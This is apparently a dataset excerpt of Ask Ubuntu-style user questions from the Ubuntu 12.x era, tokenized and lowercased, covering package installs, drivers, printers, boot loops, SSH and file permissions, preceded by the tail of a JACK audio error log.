= 1024 frames ( 21.3 ms ) , buffer = 2 periods alsa : final selected sample format for capture : 32bit integer little-endian alsa : use 2 periods for capture alsa : final selected sample format for playback : 32bit integer little-endian alsa : use 2 periods for playback 14:02:57.058 could not connect to jack server as client . - overall operation failed . - unable to connect to server . please check the messages window for more info . can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started 14:03:02.140 shutdown script ... 14:03:02.141 dreamstudio-stop-jack jack main caught signal 15 released audio card audio1 released audio card audio0 jackdmp : no process found audio_reservation_finish jackdbus : no process found -- - stop e : [ pulseaudio ] main.c : failed to kill daemon : no such process # making sure pulseaudio will restart if it crashes # starting pulseaudio # connecting pulseaudio to jack 21 failure : module initalisation failed 14:03:14.725 jack was stopped successfully . 14:03:14.728 post-shutdown script ... 14:03:14.730 dreamstudio-restart-pulseaudio # making sure pulseaudio will restart if it crashes # starting pulseaudio # connecting pulseaudio to jack failure : module initalisation failed failure : module initalisation failed 14:03:24.879 post-shutdown script terminated with exit status=256 . 14:03:24.881 shutdown script terminated with exit status=256 .
226145	how to use multiple python versions on the same system ?	i am trying to install keryx which requires python < 2.7 i want to be able to use this software and yet not uninstall the newer version of python from my system and mess up any other programs that might be using it . how can i install the above in my current setup ? a similar question exists here but does not have a valid answer - how can i downgrade python or use many versions ?
226148	unable to locate package pkgconfig	i try to install ruby on ubuntu 12 . there is one of the commands which gives me an error e : unable to locate package pkgconfig sudo apt-get install build-essential openssl libreadline6 libreadline6-dev curl git-core zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt-dev autoconf libc6-dev ncurses-dev automake libtool bison subversion pkgconfig reading package lists ... done building dependency tree reading state information ... done note , selecting 'libxslt1-dev ' instead of 'libxslt-dev' note , selecting 'libncurses5-dev ' instead of 'ncurses-dev' e : unable to locate package pkgconfig i even did sudo apt-get update & & sudo apt-get install pkgconfig but it did n't help . how do i install pkgconfig ? if it helps you somehow alex @ ubuntu : ~ $ cat /etc/apt/sources.list # deb cdrom : [ kubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.1 ) ] / quantal main multiverse restricted universe # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu quantal main restricted deb-src http : //archive.ubuntu.com/ubuntu quantal main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu quantal-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu quantal-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu quantal universe deb-src http : //archive.ubuntu.com/ubuntu quantal universe deb http : //archive.ubuntu.com/ubuntu quantal-updates universe deb-src http : //archive.ubuntu.com/ubuntu quantal-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu quantal multiverse deb-src http : //archive.ubuntu.com/ubuntu quantal multiverse deb http : //archive.ubuntu.com/ubuntu quantal-updates multiverse deb-src http : //archive.ubuntu.com/ubuntu quantal-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu quantal-backports main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu quantal-backports main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu quantal-security main restricted deb-src http : //archive.ubuntu.com/ubuntu quantal-security main restricted deb http : //archive.ubuntu.com/ubuntu quantal-security universe deb-src http : //archive.ubuntu.com/ubuntu quantal-security universe deb http : //archive.ubuntu.com/ubuntu quantal-security multiverse deb-src http : //archive.ubuntu.com/ubuntu quantal-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu quantal partner # deb-src http : //archive.canonical.com/ubuntu quantal partner # # uncomment the following two lines to add software from ubuntu's # # 'extras ' repository . # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu quantal main # deb-src http : //extras.ubuntu.com/ubuntu quantal main
226154	how to use `` /var/cache/apt/archives '' ?	last night my system ( ubuntu 12.04 ) was crashed , and i had to install the ubuntu 12.04 again . actually i have `` /var/cache/apt/archives '' , that it 's for my previous os , but when i wrote this command as a root user : sudo dpkg -i /var/cache/apt/archives/*deb after several times show me this error : system halted because there were too many errors ... and my ubuntu did n't boot again , so i installed it again , now how to use /var/cache/apt/archives and is there any way to handle this problem please ?
226160	is there a ppa or repository where we can update libreoffice to version 3.6 ?	on http : //www.libreoffice.org/download/ there is only rpm version - when great majority of desktop linux users are using systems based on apt ... ppa : libreoffice/ppa seems to be very outdated with version 3.5 it 's frustating to see several fixes on windows version and ubuntu versions so outdated ... people generally reply as : we do n't update due to security/stability reasons , etc example 1 example 2 why do n't you compile yourself ? for those easy answers , i generally reply : let me decide which version to use at my own risk . i just want to try a newer version and i trust on libreoffice devs . i understand that update a core lib is very dangerous but libreoffice is an user application and it do n't just break the whole system . why do n't i compile ? because i am a regular user and do n't have time to learn it . i would love to have this time but unfortunately , i do n't have . red hat/fedora guys have the same concerns but they update their libreoffices ...
226164	prevent certain files from being moved or deleted by a user	there are some important files that i might delete by accident ( if i 'm not careful ) , and i need to ensure that these files can not be deleted or moved . is it possible to set file permissions so that i can not delete or move certain specific files ? also , is it possible to prevent files from being moved or deleted by non-root users ?
226168	pasword space is blank under vmware , what can i do ?	i upgraded to ubuntu 12.10 on my vmware and now the password space is just not there . it says the name of user but no space to enter the password . what to do ?
226170	how do i remove ubuntu and put osx back on ?	i recently installed ubuntu 12.10 on my mac os 10.8 and i 'm having some trouble getting used to it and everything . i want to make it a mac again . how do i do that ? i 've already tried to install my cd that came with the computer , but it does not work .
226178	how can i remap usernames when printing to a shared printer ?	at work my group currently use self maintained network printers . we also run our own self contained linux network for some members of the group . it all works beautifully . the management has decided that it will be more efficient and sustainable for everybody to use centrally maintained printers . this brings us a number of useful features such as being able to submit a print job and then pick it at any printer we want . the problem is that printing will be tied into the central authentication system , which we do n't use . it turns out that we do n't actually have to make use of the authentication as such , we just need to make sure that the username a print job is submitted under has the correct username - otherwise you ca n't pick it up . we could change all of the username and home directories for all of our users to match the centrally managed ones , but understandably we 'd prefer not to do that . if we can remap our usernames to the centrally managed ones for printing then everything should just work . we 're currently using cups for our printing needs and as far as i can tell it does n't support any form of username remapping . is this correct ? i do know that samba supports username remapping , but i 'm not sure if it would work in this configuration . we need : local username print ( to our server if necessary ) - > username remapping to central username - > print job sent to print service . can anybody suggest how we might achieve this ?
226184	lenovo w520 back usb port not working	the usb port in the back of my laptop ( on the right side when viewed from using perspective ) is not working . does anybody know if we can get this port working , and what the port number is . here is my lsusb , if it can help . % lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 046d : c01e logitech , inc. mx518 optical mouse bus 003 device 003 : id 046d : c318 logitech , inc. illuminated keyboard bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 0765:5001 x-rite , inc. huey pro colorimeter bus 001 device 004 : id 147e:2016 upek biometric touchchip/touchstrip fingerprint sensor bus 001 device 005 : id 0a5c:217f broadcom corp. bluetooth controller bus 001 device 006 : id 04f2 : b217 chicony electronics co. , ltd lenovo integrated camera ( 0.3mp ) bus 002 device 003 : id 17ef:1003 lenovo integrated smart card reader i am running 12.10 , upgraded from 12.04 but it did not work either in 12.04 . the two usb ports on the left work just fine . edit : i just updated my bios from 1.32 to 1.39 , no change in behaviour . the port does not even power up my devices . edit 2 : booted up windows , and the port is working . i went into the device manager and looked at the usb settings . i found my usb drive on port 2 , hub 3 , i just do n't know how that relates to the bus and device numbers of linux . in windows , smart card reader was on usb hub located at port 1 hub 2 , fingerprint and bluetooth were on usb hub located at port 1 hub 1 edit 3 : went and looked at this so post . tried to look at my kern.log file with tail -f /var/log/kern.log . got some activity when plugging/removing devices in other ports , but nothing happens when connecting a device into that port . it really looks disabled . looked at my usb1-4 sys/bus/usb/devices/usb1/power/control and they are all set on auto . as expected , usb4 have version 3.00 , the others ( usb1-usb3 ) are 2.00 .
226186	gimp opens too big for the screen in ubuntu 12.10 ?	gimp 2.8.2 opens too big for the screen ( some of it is visible in the lower workspace when using workspace switcher ) . if i maximize it , it 's too big on top . how can i make it be within the screen ? thank you for your answer , but i still have n't resolved my issue . i somehow managed to keep it on one screen in workspace switcher ( by temporarily hiding all docks ) , but when i click on it it 's still too big .
226189	ubuntu on an acer c7 chromebook ?	has anyone succeeded in installing a plain vanilla ubuntu ( or other linux distribution ) install on the acer c7 chromebook ? i am aware of the chrubuntu project but would prefer a plain vanilla ubuntu install if possible . i am not sure how the special google firmware influences a standard linux install ?
226191	please help new install 12.10 black screen	hey guys new to the forum and new to ubuntu , i installed 12.10 via a usb and all went well anyway since the installation has finished all i keep getting is a black screen i have a old dell laptop , dell latitude d610 , i really do n't know what to do so any help would be great because now i have a laptop what does n't work thanks guys
226204	how do i type on the next line in the terminal ?	i am using ubuntu 12.10 and want to run a set of commands in the terminal , and from what i see in the instructions , these commands each start on a new line . i do n't know how to do this in the terminal . i ca n't find what key to press to do the carriage-return to the next line .
226208	i ca n't find a file in ubuntu 12.04	i used the code in terminal sudo mv filename.jpg /usr/share/backgrounds but when i check there , it is missing , also ca n't find in /home
226210	how to get rid of `` open in terminal '' choise in thunar	i want to open a folder in a launcher menu ( home ) , say `` downloads '' . i select it and then a submenu emerges with two choises : uppermost `` downloads '' , and behind it `` open in terminal '' . how can i get rid of that submenu and just get into `` downloads '' ? one click- > downloads ( no submenues )
226214	automatically 'select all ' in browser address/search bars	is it possible to automatically 'select all ' when i left click in a browser address/search bar . i know it 's only one more click by right clicking and then choosing 'select all ' and i probably sound a bit fussy but it 's feature i like . i 'm using ubuntu 12.10 64bit , chrome and firefox thanks in advance . as an update , chrome now does this automatically
226227	how to manually restart services affected by apt upgrades ?	how can i issue apt upgrades without automatically stopping/starting daemons ? i 'd like to manually restart services . to cite a specific example : i 'll revisit a long-running machine and run sudo apt-get update & & time sudo apt-get dist-upgrade . this is a very straight-forward means of seeing all available upgrades , followed by a simple enter keypress to get the systems fully patched . if i see postgresql-9.1 in the upgrade list , i abort the upgrade . in that case , apt would stop the service early in the process , apply several non-critical operations , then restart the service much later . a routine upgrade could cause minutes of downtime . i 'd like to say `` yes '' to the upgrade to get all patches applied , then manually restart the service at a convenient time .
226228	how to replace grub with burg ? not on mbr	this question is repeating , i know but i ca n't answer it as i do n't have an answer and i can not comment either to get some insights on this thing . how to replace grub with burg without overwriting mbr ? no matter what i do , i can not change to burg . is there any way to change the default directory to /boot/burg rather than /boot/grub i use easybcd to detect grub2 . is there any way to make easybcd choose burg rather than grub ? worst case scenario : i am planning to remove /boot/grub folder , but will that make burg default ? ps : i do not have any second power button in my laptop and so i can not configure it the way this guy has configured .
226233	could not display `` smb : //	i 'm trying to mount a windows share in ubuntu 12.10 and pinguy 12.04 with nautilus . i 'm getting the typical `` could not display `` smb : //192.168.0.7/groups '' error message . the share 's name is groups , i 've typed in location ( ctrl+l ) `` smb : //192.168.0.7/groups '' . you can see that the error message says `` smb : //192.168.0.7/groups '' without the uppercase `` g '' . i 've created a new share in the same server , same location , same permissions with all name in lowercase . this works fine . the problem is the first uppercase letter in the sharename . i 've the same problem in other server than ca n't change share names . this is a ubuntu related problem , because the shares works well with the rest of the network systems . there are an option in nautilus to ignore uppercase letters in share names ? i 'm trying to migrate all windows stations to ubuntu , but need this problem resolved . thank you in advance .
226235	i am not able to login to another laptop	i am using this command : usera : ~ $ sudo ssh userb @ 192.168.1.3 it says ssh : connect to host 192.168.1.3 port 22 : connection refused . i want to login remote & this is not working . in a forum they said that if in the file /etc/ssh/sshd_config if i change it to port 2222 it would work , but its still not working . after this i want to transfer some of my media files to other laptop . can anyone help me with that too ? thank you . ps : i am using ubuntu maverick and he is on 12.04 .
226237	do i need duplicate values in nginx [ sites-available ] configuration ?	do i need duplicate all new configuration entries ( location = ... ) from # part 1 to part 2 in nginx virtual-host configuration file ? eg . : first part of /etc/nginx/sites-available/mywebisteurl.com server { listen 80 ; location = / { try_files $ uri $ uri/ /index.php ? q= $ uri & $ args ; } second part of the same file server { listen 443 ; ... ... ... . }
226238	can i unlock other resolutions ? its running on 1024x768 and i need 1280x720 or 1920 ă 1080	i 've installed ubuntu 12.04 lts and it does n't get my screen resolution right . what should i do ?
226239	bootable backup ( clone )	i keep a backup of my settings and files using : sudo rsync -- verbose -- recursive -- links -- perms / /media/backup/ is it possible to use rsync ( or other bash options ) to make a bootable backup of everything ? i just want to `` clone '' everything to a pendrive or another disk and be able to work with the exact same enviroment . and i mean everything , like it was on the original disk ( from permissions to installed apps , configs , paths ) . i do n't really trust gui 's to do this kind of job so i 'm avoiding anything from the store .
226240	endless loop when booting from a unbuntu usb disk	i 'd like to install ubuntu on a pavilion g6 2255 but unfortunately the computer enters an endless loop during boot . what i observe is 1. the screen is switched off 2. a few seconds later , the screen is switched on but remains blank and dark 3. repeat from step 1 i reproduced these steps with ubuntu 12.10 and 12.04 both in 32 and 64 bits either from a cd or a usb key . i also tried to boot from a live usb key with the same results . my usb key works fine as i can boot from it with another computer . what can i do to overcome this bootloop ? i read about setting modset=0 in the boot config file , in order to circumvent the lack of drivers for some recent graphical cards , but i 'm not certain that would resolve my boot loop problem edit as asked in the comment beneath , no text gets printed during the process i described . actually i do n't even believe this problem is related to ubuntu since when i press escape during step 2 , i can almost access the computer boot/bios menu . but the computer `` runs short of time '' and reboots . in order to check if it was ubuntu related my plan was to boot from some other usb-based unix both with my old computer ( that actually boots ubuntu ) and with my new hp pavilion g6 2255 , then compare . as i have installed osx mountain lion on my old mac today ( a third computer ) via usb , i decided to use it as a test specimen . here are the results : old pc : nothing , just an underscore prompt blinking on the screen ( which was to be expected since it is amd-based ) . hp pavilion : the boot loop i described above on this basis , i decided it was n't ubuntu related and tried to toggle the settings that seemed relevant in the bios , one by one . i first changed the way usb behaves during boot and set the computer to recognize usb as 2.0 during pre-os stage then enable usb 3.0 afterwards . the boot loop was still there . then i enabled legacy support which is useful for some `` old '' os then booted on the osx dongle . i observed the same blank but switched-on screen as in step 2 but without the loop . that 's when i decided to try to boot from a ubuntu install disc , with the hope that i had overcome the boot loop problem and that now osx was the problem ( which is probably to be expected since this is a 100 % legit osx version , not something to build hackintoshes ) . and that 's when i got that epic result : after having inserted the disc and forced the computer to reboot it turned out i 'm not even able to switch my computer on anymore . i press the power button and absolutely nothing happens , just like if i was trying to power on a brick . so i guess i solved the problem from above but i think i need some more help ( i 'm actually laughing as i write this ) : i will return this god forsaken time abyss pc to the store . is it legit/legal/allowed/in the scope of my warranty to do what i have done ? i mean trying to boot on a osx usb stick with no intent of installing it whatsoever ? how should i act ? tell them the truth or act like a fool that just wanted to install ubuntu on his laptop ? thank you .
226242	internet connection goes off , but it says that it 's connected ubuntu 12.04	well , i 'm a new user of ubuntu and i installed ubuntu 12.04 on my hp pavilion dm4 , everything works fine , but after a period of time on internet , the pages do n't load . it 's not my modem because i can use internet with my cellphone . i disable the connections and even i disable my wifi adapter but the only solution is to restart my computer , can you help me ?
226244	how to see the localhost traffic details ?	i have hosted my website over the local network in ubuntu maverick . i want to see all the requests coming in to my website through terminal and then log it into a file . what should i use ? and is it possible to see all the ip address which has sent the request ? i am using xampp server . thank you .
226251	installing skype on x64 12.10	so for the past 2 days i 've been trying to install skype and none of the solutions i find seem to be working if i download the file from the skype website the software centre says wrong architecture 'i386' if i run : sudo apt-get install skype it gives me : the following packages have unmet dependencies : skype : depends : skype-bin but it is not installable e : unable to correct problems , you have held broken packages . and i have tried the following commands at some time or other during the search on the internet . ( not necessarily after each other ) sudo apt-get clean sudo apt-get -- purge remove skype* sudo apt-get -f install as for system data : uname -a ; lsb_release -a returns : linux ubuntu 3.5.0-19-generic # 30-ubuntu smp tue nov 13 17:48:01 utc 2012 x86_64 x86_64 x86_64 gnu/linux no lsb modules are available . distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal
226257	how can i validate a pdf 's digital signature with evince ?	a while ago i received a pdf file that was digitally signed . the document viewer ( evince ) shows me that the digital signature was not validated . how do i add the file 's digital signature to evince so that the warning disappears ?
226262	why gwibber-service keeps poping up even if i deleted gwibber ?	my ubuntu 12.04 had been getting annoyingly slow during the day.. so i decided to have a terminal running top in one of my monitors at all times . i noticed that gwibber-service - gwibber is a ubuntu default application - was poping up in the top of cpu usage plenty of times . i deleted it . now days after its deletion i keep seeing the process gwibber-service popping up ! i kill it by its pid , but what i really want to know is why that process is running there after the application was deleted . of course how to completely remove it wo n't hurt [ update ] reverse dependancy on gwibber-service check shows these packages : gwibber-service gwibber : i386 ubuntu-sugar-remix desktopcouch ubuntu-desktop i think desktopcouch is responsible for this as it is what ubuntu uses to synchronize ( thunderbird , ubuntu one , social media.. ) . i really want to know why this part of gwibber is not deleted with standard uninstall . should i report somewhere ?
226263	blank desktop after installing amd driver on ubuntu 12.10	i did a fresh install of ubuntu 12.10 x64 and installed amd catalyst version 12.10 . after rebooting the desktop is blank and unity does n't load . when i uninstalled amd drivers , it was fine again . i also tried to install drivers from `` additional drivers '' from `` software sources '' window , but result was same . i am having a radeon hd7770 graphics card and i am using 1920x1080 resolution.system is very slow with x.org drivers . i need help/suggestions to install proper drivers . thanks
226275	which desktops are completely minimalist ?	i have been searching around at different desktop environments and a couple days ago , i came across a post that listed an environment that was completely blank and the menu was accessed through a right click . i do n't remember what it was called . can anybody point me in the right direction ?
226276	command-line argument issue	i have a bash script called test.sh and it current is : url= lynx -dump $ url > story.txt echo `` step one completed '' except when i run ./test.sh http : //www.fox.com or any website , story.txt says : forbidden you do n't have permission to access / on this server . how do i fix it so that when i open story.txt , it displays the actual dump of the url ?
226278	run script on wakeup ?	is there a way to run a script when a computer `` wakes up '' ( from sleeping ) ? i know it can be done on startup , obviously , but the issue in this case is that the backlight of my laptop seems to reset every time it wakes up from sleep , and i 'd ideally like to have a script take care of turning it down to a reasonable level instead of having to type it in manually every time .
226279	ubuntu 12.04 as xen dom0 with gui	i will create a homeserver with xen who has a graphical user interface ( for watching tv , browse the internet etc ) . the problem is , if i install xen after my ubuntu desktop install , my ( dom0 ) ubuntu starts only in console mode . is there a way to combine xen and ubuntu with gui as dom0 ? greets
226286	upgrade ubuntu server from 11.04 to 11.10 without internet connection	we have application software that really likes ubuntu server 11.10 . i need to upgrade several 11.04 servers to this version . two questions : the servers that need to be upgraded do not have internet access in our datacenter due to security reasons . i need to download the updates/upgrades to a secure system and then transfer them to the datacenter servers for installation . is anyone aware of the steps involved ? how/where do i get the 11.10 updates from ? i do n't see an option on the ubuntu site for downloading specific versions of the os and/or upgrades .
226287	problems with nvidia 310.19 drivers on personal computer	any way to make nvidia 310.19 driver to work on a desktop pc . i have i5 2500 processor , leadtek gtx 460 oc video card , and so far these drivers messed up my whole ubuntu 12.10 os . does n't work no matter what i do . i tried to play for example guild wars 2 installed with playonlinux and i have high fps losses . need to know a way to fix this , to quit windows 7 for ever .
226288	windows backup in ubuntu	i am trying to copy the c : \users folder from a windows 7 installation for a backup under ubuntu 12.04 live cd . the file transfer seems to be calculating way more info than there actually is in the folder . i am assuming this is do to the `` shortcuts '' in windows . it seems to want to copy every shortcut as an full fledged directory . is there some other way of doing this easily ? drag in drop in nautilus ?
226295	libreoffice command line conversion - no output file ?	i am using libreoffice installed on my linux box and i seem to be having a weird problem in that the conversion seems to be taking place , and there seem to be no errors , but there is no output file in the specified output directory . here is an example of the command i am using : /opt/libreoffice3.6/program/soffice -- headless -- invisible -- convert-to pdf /dir/file.pptx -- outdir /dir and here is the result of that command : convert /dir/file.pptx - > /dir/file.pdf using impress_pdf_export but the problem is that after running the conversion /dir/file.pdf does not exist . i tried a doc file and the command worked , and saved properly . even though the conversion seems to be taking place with the pptx file , it does not seem to save it anywhere , oddly . do any of you have any suggestions ?
226297	ftp changes file permisions	i am trying to make changes to my website over ftp but when i save any files it changes the permissions and owner to my username . i can edit files in the same folder trough samba without changing the permissions . i really do n't understand how the permissions for the /var/www folder work and i 'm pulling my hair out trying to get it to work . i have recently made changes to the permissions of the /var/www directory ( following this guide ) so i could modify files in the www root . right now i have the entire contents of /var/www set as -rwxrwxr-x 1 www-data www-data but when i change a file over ftp it becomes -rw -- -- -- - 1 akbkuku akbkuku , akbkuku being my username . i am using vsftpd as the server , and i login with my normal user . how do i make it leave to permissions alone ? at this point i 'll even take a way yo reset all the permission back to stock and i 'll just never modify files in the web root .
226301	multiple simultaneously logged in users , each with their own vpn connection ?	i want to set up a server where multiple users can be logged in at the same time and do development and heavy builds instead of building on laptops . i 've set up a 10.04 lucid computer running freenx . the clients are also running 10.04 with the nomachine nx client . it works great , but for one thing - it 's a requirement that every user connects to an external vpn using their own credentials . when the second user logs in , the connection set up by the first user is shared , including the vpn connection . this happens while quick switching to another user as well , so it 's not directly related to nx . the network manager icon is missing on the second user 's desktop , which seems to be a known issue , but i doubt it would help if it was there since the connection is shared anyway . is there any way for multiple simultaneously logged in users to use the same connection , and still use their own vpn credentials ? do i need to step away from the network manager and configure this setup manually somehow ? i would prefer to use freenx , but if the current setup will not work , is virtualization an option ?
226304	how do i get localized names of application in python ?	this code gives me only english application name if .desktop file does not have `` name [ * ] '' options ( like in totem.desktop ) but only `` x-ubuntu-gettext-domain : totem '' : from gi.repository import gio app = gio.app_info_get_default_for_type ( 'video/x-flv ' , true ) print app.get_name ( ) this like code gives me proper result for vlc.desktop . ubuntu dash shows proper localized names for all applications . how do i get localized names of application in python ? sorry for my english .
226307	how to install a brother hl2270dw laser printer ?	how can i install my brother hl2270dw laser printer ? there are no drivers available in the software center .
226308	launcher does not reappear after auto-hide	i am having trouble getting launcher to appear after auto-hide . i have tried adjusting the sensitivity , and have even reset the launcher with no luck . when i turn on the auto-hide function , the only way to get the launcher to re-appear is to turn auto-hide off . does any one know how to fix this ?
226318	ubuntu not respecting custom keymap	i have modified my keymap for dvorak in the file /usr/share/x11/xkb/symbols/us , but it does not load properly , even after multiple reboots . suggestions ? edit : a partial solution i have found is overwrite a language that i have n't ever used . this leads me to believe that ubuntu puts a temporary us map file somewhere that it pulls from , as i did n't even have to restart x to get it to work .
226321	magic mouse inoperable upon resume	i 'm using a fresh install of ubuntu 12.10 on a samsung np700z7c-s01us . the magic mouse worked out of the box after a successful pairing . but when i suspend the laptop , the magic mouse is inoperable upon resume . i spent the past 72 hours tweaking , and this what i 've got : xinput disable 13 ( that 's the magic mouse device id ) xinput enable 13 is the only thing aside from reboot that will make it work again . restarting the bluetooth service , switching the mouse on/off , disconnecting/connecting it ... was useless . so i tried to stick these commands in /etc/pm/sleep.d/20_magicmouse like so : # ! /bin/sh # /etc/pm/sleep.d/20_magicmouse # jul magic mouse reset case $ 1 in resume|thaw ) xinput -- disable 13 xinput -- enable 13 ; ; esac it does n't work ! then i tried to suspend the hid_magicmouse and/or bluetooth module in /etc/pm/config.d/10_magicmouse like so : # /etc/pm/config.d/10_magicmouse # unload modules upon suspend suspend_modules= '' bluetooth , hid_magicmouse '' i tried a lot of combinations to no avail . i ended up creating an alias and invoking it manually upon resume , but it does n't satisfy me fully . the ubuntu experience has been so smooth , that it really breaks the fourth wall .
226324	google earth will not reinstall	i was trying to perform the the fix found at this link http : //www.omgubuntu.co.uk/2012/01/how-to-make-google-earth-look-native-in-ubuntu it requires you to delete certain files from the /opt/google/earth/free folder and then add some new ones that you download . i deleted the files but the links to download the new ones were unusable . i was using gksudo nautilus so trash was disabled meaning i could not restore the files i had deleted . i the tried to go to the google earth website and reinstall it . i downloaded the .deb but when i tried to install it it gav me an error message saying `` can not install ia32-libs '' i tried installing this via terminal and it gave me an error message saying chad @ chad-lenovo-g570 : ~ $ sudo apt-get install ia32-libs [ sudo ] password for chad : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch e : unable to correct problems , you have held broken packages . now i am stuck without a functioning google earth . how can i fix this ?
226326	unable to print using network printer on ubuntu 12.10	i am unable to print using network printer on ubuntu 12.10.it is printing blank pages . it used to work fine before . when i upgraded to ubuntu 12.10 , afterwards it is printing blank pages . i tried to remove the network printer and added again . but it is giving blank print copies only . the printer is from konica minolta ( magicolor 5650 ) . please send me any suggestions to overcome this problem . thank you .. sowmini
226328	accessing live usb files from new hd ubuntu install	after my live usb ( ubuntu 12.04 lts ) refused to boot , i proceeded to install the same ubuntu version on the laptop hard drive ( a dual boot next to win xp ) . this all went well without a hitch . previous to this , i spent several weeks enjoying and exploring ubuntu from the usb pendrive . during this time i changed lots of settings and customized firefox and more . now , i 'd like to import the home folder from the usb drive into the new install home folder on the hard disk , which is the purported folder that holds all those special settings to my knowledge . unfortunately and only being familiar with windows file systems , the view of the usb file system from the new hdd install is totally perplexing . i ca n't find anything that looks anywhere close to the original file system . more , i ca n't find any of the files i had created and stored there , like the libreofficecalc file that has all my passwords ( this one is really discouraging ) that was stored on the ubuntu desktop . help me find this file alone and i 'll bow down with full apologies to any and all computer gods . being able to import all those customizing settings into the new install would be a major bonus also , but hey , i 'm not greedy . i 'll take the passwords file and be happy ! and humble ! i would be very grateful for some clear , understandable help on this . thanks
226329	run rdp server on ubuntu 12.10	what 's the best way to run a rdp server on ubuntu 12.10 ? i 'd like to run an rdp server on my desktop running ubuntu 12.10 and be able to login from another 12.10 machine using the remote login feature at the login screen . i 've installed xrdp but it does n't seem to work with unity-3d any ideas ?
226331	no keyboard on nexus 7 installation	i installed ubuntu on nexus 7 but when i get prompted the installer on the tablet , i cant type anything . i also do n't see the taskbar anywhere . is it a corrupt attempt to install on nexus 7 ?
226332	how to install a canon mf8040cn printer on ubuntu 12.04	how to install a canon mf8040cn printer on ubuntu 12.04 . no help from canon who say they support linux but do n't even have a driver download on their site !
226335	how to create shortcuts to different firefox profiles	i followed the instructions present here in order to use two firefox profiles simultaneously . but i would like to make this process faster by starting each profile from its own shortcut . how do i create a shortcut to launch each profile ?
226336	installed ubuntu-desktop in kubuntu but it 's not like a new ubuntu	i intalled kubuntu 10.01 , then ugraded to kubuntu 12.04 then after a while i used sudo apt-get install ubuntu-desktop in order to have a desktop environment just like a brand new installed ubuntu 12.04 , but some of nice visual effects-like workspace switcher or messages about connecting to a network or a vpn connection establishing or failing that show in the top right of screen and they blur when mouse hovers them ... .- do not show as they should and they 're so much simpler : |
226337	very slow local network startup	this question is from a supernewby -- not with computing , just with ubuntu , which i installed today . my only problem -- so far -- is trying to open folders under `` browse network '' in the file manager . at least i guess it 's the file manager , though nowhere do you find those words . you get to `` browse network '' by clicking the `` home folder . '' my network printer and `` windows network '' pop up soon enough , but double-clicking `` windows network '' may get to my local network , called `` localan , '' or it may claim a timeout after about 100 seconds . if it does open localan , it shows the two windows and a debian machine on that network . trying to open one of them is the most problematic . oddly enough , after many timeout reports , suddenly the selected machine will open . at least it has once in an afternoon of trying . once it opens , files in its folders are readily accessible . the hardware ca n't be the problem . yesterday i was running windows vista on it . local network access was slick as a breeze and not the reason i abandoned windows . typically after a minute or so , trying to open `` localan , '' i get the following notification : '' sorry , could not display all the contents of `` windows shares on localan '' : dbus error org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . '' and nothing else . clicking `` localan '' again gets the same timeout and message , although once it did return the list of machines on localan . note that i am submitting this question from the same machine , using the same hardware and software , so it ca n't be the ethernet adapter . curious that this is an intermittent problem , which in my experience is rare in software . i ca n't believe that other users would tolerate it . does anyone have a suggestion ? thanks for your attention . -- robert smith
226340	linux-headers-3.5.0.19 needs to be installed but i ca n't find a archive for it . please help !	this error keeps showing up . i ca n't update through the little red circle caution symbol and when i open the software center it stalls and then shuts down . i tried to do the sudo apt-get install -f thing , but that just said `` could not get lock /var/lib/dpkg/lock - open '' what does this all mean ? if anyone can help , please use new-user-friendly words and be descriptive .
226342	how can i change mouse sensitivity permanently with xset ?	i know i can use xset m 3 1 to change the sensitivity of the mouse but when i turn off my computer it will go back to normal . any way to prevent this ?
226343	the google webapp does not integrate gmail	i believe online accounts is supposed to look something like this . ( i cant post pictures yet ) on my computer ( ubuntu 12.10 ) it looks like this . where is mail ? calendar ?
226344	how do i convert pocket word files ( psw ) to odt ?	i have a bunch of psw ( pocket word for pocket pc ) files i want to get the text out of . they were copied off an old pocket pc years ago without being converted . no , i do not have the pocket pc any more , just the files on my ubuntu machine . right now , if i try to open the files , even if i select `` pocket word '' in the file open dialog , it pops up the ascii filter , which just provides me with reams of # # # characters . a document that was once a dozen pages of text is now 261 pages of # # # # # # # # # # # # # # with the occasional word thrown in . the libreoffice documentation assumes i have windows and the original pocket pc with outlook and a bunch of microsoft stuff installed . not particularly useful for a ubuntu user . : )
